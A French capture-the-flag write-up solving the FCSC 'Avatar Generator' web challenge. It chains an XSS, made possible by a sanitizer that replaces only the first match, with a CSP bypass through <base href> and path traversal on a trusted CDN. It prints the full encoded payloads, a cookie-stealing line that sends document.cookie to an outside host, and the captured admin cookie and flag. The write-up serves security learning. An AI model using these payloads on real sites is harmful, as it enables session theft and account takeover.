# Avatar Generator

Le hasard fait parfois bien les choses.

https://avatar-generator.france-cybersecurity-challenge.fr/

## Reconnaissance

![avatargenerator.png](avatargenerator.png)

Le site permet de générer des avatars au hasard. Il tire au sort des paramètres : `seed`, `primaryColor`, `secondaryColor` ou utilise ceux passés en GET, et génére une image. Celle-ci peut être partagée sur Twitter, avec un pointeur vers le site et les bons paramètres de génération. Tout cette mécanique est codée en javascript côté client.

Le reste des pages est écrit en PHP:
- `/index.php` : page d'accueil.
- `/contact.php` : permet d'envoyer à l'administrateur une URL du générateur qui poserait problème ainsi qu'une description.
- `/admin.php` protégé par un mot de passe.

On remarque les directives CSP déclarées dans le code :
```html
<meta http-equiv="Content-Security-Policy" content="trusted-types default color integer">
<meta http-equiv="Content-Security-Policy" content="script-src rawcdn.githack.com/caroso1222/notyf/v2.0.1/dist/ 'self'; object-src 'none'; trusted-types default color integer;">
```

On peut voir qu'on fait confiance à un CDN, et que des `trusted types` sont décrits. On peut le confirmer en regardant les scripts javascript inclus dans la page (note: certains, sans intérêt, ne sont pas fournis ici):
- [assets/app.js](assets/app.js) : logique applicative générale de l'appli.
- [assets/policies.js](assets/policies.js) : les règles de validation annoncées dans les CSP.
- [assets/stats.js](assets/stats.js) : contient `/*TODO*/`.
- [assets/stats.loader.js](assets/stats.loader.js) : qui charge le précédent après une temporisation d'1s.


## XSS

Intéressant : quand on clique sur `Share Avatar`, le site construit une URL avec ces paramètres pour générer un tweet: `https://avatar-generator.france-cybersecurity-challenge.fr/?seed=18916&primary=%231abc9c&secondary=%233498db`. Comme indiqué plus hat, tout est rendu en javsscript par le client.

En jouant avec les paramètres, on voit qu'ils sont validés par les directives `trusted-types`. En particulier, si on essaie de passer autre chose qu'un entier pour la seed dans l'URL, on se fait dégager :
```js
let integerPolicy = TrustedTypes.createPolicy('integer', {
    createHTML(integer) {
        if (RE_INTEGER.test(integer)){
            return integer
        }
        throw new TypeError(`Invalid integer '${integer}'`);
    }
})
```

Bizarrement, on ne voit pas de conséquences au `TypeError` dans la console javascript ou ailleurs. En fait, quand on creuse un peu plus le code :
```js
document.addEventListener('DOMContentLoaded', function(){
    debug = false
    if (window.location.hash.substr(1) == 'debug'){
        debug = true
    }
    [...]
    catch(error){
        if (debug) {
	    let errorMessage = "Error! An error occured while loading the page... Details: " + error
	    document.querySelector('.container').innerHTML = errorMessage
        }
        else {
            generateRandomAvatar()
        }
    }
```

Donc, si on ajoute un `#debug` à notre URL, l'erreur s'affiche :
`https://avatar-generator.france-cybersecurity-challenge.fr/?seed=plop&primary=%231abc9c&secondary=%233498db#debug`

![error](error.png)

Cela semble avoir un bon potentiel pour une XSS, mais si on tente d'ajouter une balise HTML dans le paramètre `seed`, elle semble échappée ! En effet, mais si on regarde de plus près nos `trusted-types`:

```js
function sanitizeHTML(html){
    return html
        .replace(/&/, "&amp;")
        .replace(/</, "&lt;")
        .replace(/>/, "&gt;")
        .replace(/"/, "&quot;")
        .replace(/'/, "&#039;")
}

let sanitizePolicy = TrustedTypes.createPolicy('default', {
    createHTML(html) {
        return sanitizeHTML(html)
    },
    createURL(url) {
        return url
    },
    createScriptURL(url) {
	return url
    }
})
```

C'est en général une mauvaise idée d'essayer d'échapper soi-même et cette application en est un parfait exemple : les appels à `replace()` ne fonctionnent que sur la première occurrence du motif recherché ! Ainsi, si on passe tous les caractères en question en début de notre payload, on peut faire ce que l'on veut par la suite :

https://avatar-generator.france-cybersecurity-challenge.fr/?seed=%3C%3E%22%27%25p%3Cb%3Elo%3C/b%3Ep&primary=%231abc9c&secondary=%233498db#debug

![error2](error2.png)

On a donc bien une XSS fonctionnelle.

## Contourner les CSP

Malheureusement, cette XSS ne nous permet pas grand chose pour le moment. Pour rappel, les CSP déclarent :

```html
script-src rawcdn.githack.com/caroso1222/notyf/v2.0.1/dist/ 'self'; 
object-src 'none';
trusted-types default color integer;">
```
On voit qu'il ne va pas être possible d'injecter du javascript directement dans la page... En fait, le CDN indiqué est la seule origine possible pour du javascript. Regardons ce CDN d'un peu plus près :

![cdn](cdn.png)

Bonne nouvelle ! On peut distribuer du javascript via ce CDN en quelques clics, simplement en référençant des projets Github que l'on maîtrisent. Ainsi, en déposant ma payload sur un projet github, j'ai une URL de distribution chez rawcdn... mais pas exactement celle qui est autorisée dans les CSP (elle est très précise sur le répertoire : `rawcdn.githack.com/caroso1222/notyf/v2.0.1/dist/`).

Heureusement, il existe une technique pour contourner ce dernier point. En effet, les CSP ne précisent pas de default-src, ce qui a pour conséquence qu'il nous est possible de changer l'URL de base de la page (`<base href="...">`). Essayons cela en pointant sur notre pseudo CDN (pour cela, j'ai créé un repository `plop`, poussé un fichier `test.js` et posé un tag 1.0.0).

- Fichier taggé dans le repository : h`ttps://raw.githubusercontent.com/lrst/test/1.0.0/test.js`
- Correspondance dans le CDN : `https://rawcdn.githack.com/lrst/test/1.0.0/test.js`
- Payload : `<>"'<base href="https://rawcdn.githack.com/lrst/test/1.0.0/"><script src="test.js">`

Malheureusement, ce n'est pas suffisant : notre balise `<script>` n'est pas chargée, il faudrait que les CSP incluent `script-src: unsafe-inline`. Mais ce test fait apparaître des erreurs très intéressantes :

```
Loading failed for the <script> with source “https://rawcdn.githack.com/lrst/test/1.0.0/assets/js/stats.js”
Content Security Policy: Les paramètres de la page ont empêché le chargement d’une ressource à https://rawcdn.githack.com/lrst/test/1.0.0/assets/js/stats.js (« script-src »). 
```

On avait presque oublié ce fichier `stat.js` chargée par la page après coup ! Avec le changement de base, il est maintenant cherché à partir de notre CDN. Reprenons notre test en créant un fichier `assets/js/stats.js` dans notre repository :

- Fichier taggé dans le repository : `https://raw.githubusercontent.com/lrst/test/1.0.1/assets/js/stats.js`
- Correspondance dans le CDN : `https://rawcdn.githack.com/lrst/test/1.0.1/assets/js/stats.js`
- Payload : `<>"'<base href="https://rawcdn.githack.com/lrst/test/1.0.1/">`

Malheureusement, le résultat est le même, car notre fichier est bien sur le bon CDN, mais pas dans le bon répertoire. Peut-on parvenir à abuser le navigateur avec une base qui commence avec le préfixe attendu par les CSP, mais en remontant ensuite dans l'arborescence, à la manière d'un *path traversal* ?

Payload : `<>"'<base href="https://rawcdn.githack.com/caroso1222/notyf/v2.0.1/dist/..%2F..%2F..%2Flrst/test/1.0.1/">` (attention, ne pas oublier de l'encoder pour la passer comme valeur de `seed`).

Cette fois, on voit que notre fichier javascript est bien chargé par le navigateur ! Il est temps d'y déposer un voleur de cookie, comme par exemple `document.location="https://<my_website>/foo?c="+document.cookie;`.

> Note: on ne peut pas utiliser de `document.write()` ici, sous peine d'une erreur *`trustedtypes.build.js:46 Failed to execute 'write' on 'Document': It isn't possible to write into a document from an asynchronously-loaded external script unless it is explicitly opened`*.

URL complète : `https://avatar-generator.france-cybersecurity-challenge.fr/?seed=%3C%3E%22%27%3Cbase%20href%3D%22https%3A%2F%2Frawcdn%2Egithack%2Ecom%2Fcaroso1222%2Fnotyf%2Fv2%2E0%2E1%2Fdist%2F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252Flrst%2Ftest%2F1%2E0%2E3%2F%22%3E&primary=%231abc9c&secondary=%233498db#debug`

On voit bien notre payload exécutée, et on est redirigé vers notre site, avec notre cookie en paramètre.

## Final 

On peut maintenant la soumettre au formulaire de contact en HTTP comme la valeur par défaut du formulaire le propose (une subtilité que je ne comprends pas bien) :

```
141.95.173.217 - - [02/May/2022:21:07:47 +0200] "GET /foo?c=admin=d13e3bde2f9a8ff1f3ef377d16a5da5f26840953 HTTP/1.1" 404 7084 "http://web:2155/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/100.0.4863.0 Safari/537.36"
```

On utilise le cookie pour se connecter à la section admin :

![flag](flag.png)

Le flag est donc `FCSC{2d5e4d79789a5a9a68753350b72202478b2f9bf8}`.